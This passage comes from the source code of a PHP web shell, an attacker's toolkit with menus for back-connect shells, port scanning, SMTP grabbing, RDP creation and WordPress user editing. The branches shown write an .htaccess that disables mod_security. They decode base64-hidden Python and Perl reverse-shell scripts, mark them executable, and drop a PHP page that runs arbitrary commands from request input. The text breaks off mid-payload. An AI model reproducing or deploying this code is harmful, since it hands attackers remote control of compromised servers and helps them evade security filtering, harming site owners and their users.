  3615.    <tr>
  3616.         <td>Host</td>
  3617.         <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
  3618.    </tr>
  3619.    <tr>
  3620.         <td>Port start</td>
  3621.         <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
  3622.    </tr>
  3623.     <tr><td>Port end</td>
  3624.         <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
  3625.    </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
  3626.    </td></form></center></table>';
  3627.     }
  3628.  
  3629. }
  3630. elseif($_GET['do'] == 'ptbc') {
  3631. echo "<center>";
  3632. echo "<ul>";
  3633. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3634. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3635. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3636. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3637. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3638. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3639. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3640. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3641. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3642. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3643. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3644. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3645. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3646. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3647. echo "</ul>";
  3648. echo "</center>";
  3649.     mkdir('pyrevrshell', 0755);
  3650.     chdir('pyrevrshell');
  3651.     $seropil = ".htaccess";
  3652.     $angelinalll = "$seropil";
  3653.     $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz a&#231;&#305;lamad&#305;!");
  3654.     $dffvfdgfg = "<IfModule mod_security.c>
  3655.     SecFilterEngine Off
  3656.     SecFilterScanPOST Off
  3657.     </IfModule>";    
  3658.     fwrite ( $shitttyz , $dffvfdgfg ) ;
  3659.     fclose ($shitttyz);
  3660.     //extract python reverse script
  3661.     $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ==';
  3662.  
  3663.     $jkol = fopen("reversesh.py" ,"w+");
  3664.     $write = fwrite ($jkol ,base64_decode($vkffhd));
  3665.     fclose($jkol);
  3666.     chmod("reversesh.py",0755);
  3667.  
  3668.     //extract php command shell
  3669.     $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50ICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWdyYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMnB0Ij5Vc2FnZTogcmV2ZXJzZXNoLnB5IFtpcG11XSBbUG9ydG11XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCI+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHB5dGhvbiBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcHl0aG9uIHJldmVyc2UucHkgeW91cklQIFBvcnQ8L3N0cm9uZz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0idnciIHNpemU9IjUwIiB2YWx1ZT0iY21kIj4gPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIHNpemU9IjQzIj4gPHNlbGVjdCBuYW1lPWV4ZWNtZXRob2Q+DQo8b3B0aW9uIHZhbHVlPSJzeXN0ZW0iPlN5c3RlbTwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0iZXhlYyI+RXhlYzwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPlBhc3N0aHJ1PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT0icG9wZW4iPnBvcGVuPC9vcHRpb24+DQo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9wPjwvZm9ybT4nOw0KPz4=';
  3670.     $file = fopen("kiter.php" ,"w+");
  3671.     $write = fwrite ($file ,base64_decode($merdeeeee));
  3672.     fclose($file);
  3673.     echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Python Connect Shell Priv8</span><center><center><br><iframe src=pyrevrshell/kiter.php width=75% height=70% frameborder=0></iframe></div></center>';
  3674. }
  3675. elseif($_GET['do'] == 'pbc') {
  3676. echo "<center>";
  3677. echo "<ul>";
  3678. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3679. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3680. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3681. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3682. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3683. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3684. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3685. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3686. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3687. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3688. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3689. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3690. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3691. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3692. echo "</ul>";
  3693. echo "</center>";
  3694.     mkdir('Backperlrev', 0755);
  3695.     chdir('Backperlrev');
  3696.     $kokwkwkwkwkw = ".htaccess";
  3697.     $wkwkwkwkw_adi = "$kokwkwkwkwkw";
  3698.     $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw a&#231;&#305;lamad&#305;!");
  3699.     $zilzil = "<IfModule mod_security.c>
  3700.     SecFilterEngine Off
  3701.     SecFilterScanPOST Off
  3702.     </IfModule>";    
  3703.     fwrite ( $wkwkwkwkw , $zilzil ) ;
  3704.     fclose ($wkwkwkwkw);
  3705.     $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw==';
  3706.  
  3707.     $zerer = fopen("reverse.pl" ,"w+");
  3708.     $write = fwrite ($zerer ,base64_decode($shellololol));
  3709.     fclose($zerer);
  3710.     chmod("reverse.pl",0755);
  3711.  
  3712.     //extract php command shell
  3713.     $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudCAhaW1wb3J0YW50OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDt9ICAgICAgYXt0ZXh0LWRlY29yYXRpb246bm9uZTsgZm9udC1mYW1pbHk6IFRhaG9tYSwgR2VuZXZhOyBjb2xvcjojMDA3NzAwOyBwYWRkaW5nOjJweCAycHg7fSAgICAgIGE6aG92ZXJ7Y29sb3I6IzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwZmYwMCAwcHggMHB4IDNweDt9CSAgLmFyZWEgeyBjb2xvcjogIzAwYmIwMDsgZm9udC1zaXplOiA5cHQ7IHRleHQtc2hhZG93OiMwMDAwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogc29saWQgMHB4ICMwMDc3MDA7IGJhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDk5MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7IH0JICBpbnB1dFt0eXBlPXN1Ym1pdF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDc3MDsgIGZvbnQtd2VpZ2h0OiBib2xkOyB0ZXh0LWFsaWduOiBjZW50ZXI7ICB0ZXh0LXNoYWRvdzogMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOyAgYmFja2dyb3VuZDogI2FlYWVhZTsgIGJhY2tncm91bmQtY2xpcDogcGFkZGluZy1ib3g7ICBib3JkZXI6IDFweCBzb2xpZCAjMjg0NDczOyAgYm9yZGVyLWJvdHRvbS1jb2xvcjogIzIyM2I2NjsgIGJvcmRlci1yYWRpdXM6IDRweDsgIGN1cnNvcjogcG9pbnRlcjsgIGJhY2tncm91bmQtaW1hZ2U6LXdlYmtpdC1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1tb3otbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtby1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IGxpbmVhci1ncmFkaWVudCh0byBib3R0b20sICNlYWVhZWEsICNkMGQwZDApOyAgLXdlYmtpdC1ib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgIGJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyB9IGlucHV0W3R5cGU9dGV4dF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiAjNzc3Nzc3IDBweCAwcHggM3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwNzcwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4O30gaW5wdXRbdHlwZT1zdWJtaXRdOmhvdmVyLCBpbnB1dFt0eXBlPXRleHRdOmhvdmVyeyBjb2xvcjogI2ZmZmZmZjsgdGV4dC1zaGFkb3c6ICMwMDY2MDAgMHB4IDBweCA0cHg7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9IHNlbGVjdHsgcGFkZGluZzogM3B4OyB3aWR0aDogMTYycHg7IGNvbG9yOiAjMDBhYTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBhYTAwOyAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDt9IHNlbGVjdDpob3ZlcnsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSAgICNjb21tYW5kc3sgbWFyZ2luLWxlZnQ6IDM1MHB4OyBtYXJnaW4tcmlnaHQ6IDM1MHB4OyB9IG9wdGlvbnsgY29sb3I6ICM3Nzc3Nzc7IH08L3N0eWxlPg0KPD9waHANCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDc3MDAiIGZhY2U9IlRhaG9tYSIgc3R5bGU9ImZvbnQtc2l6ZTogMTFwdCI+VXNhZ2U6IHBlcmwgcmV2ZXJzZS5wbCBbaXBtdV0gW1BvcnRtdV08L2ZvbnQ+PGJyPic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiANCjxpbWcgYm9yZGVyPSIwIiA+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sI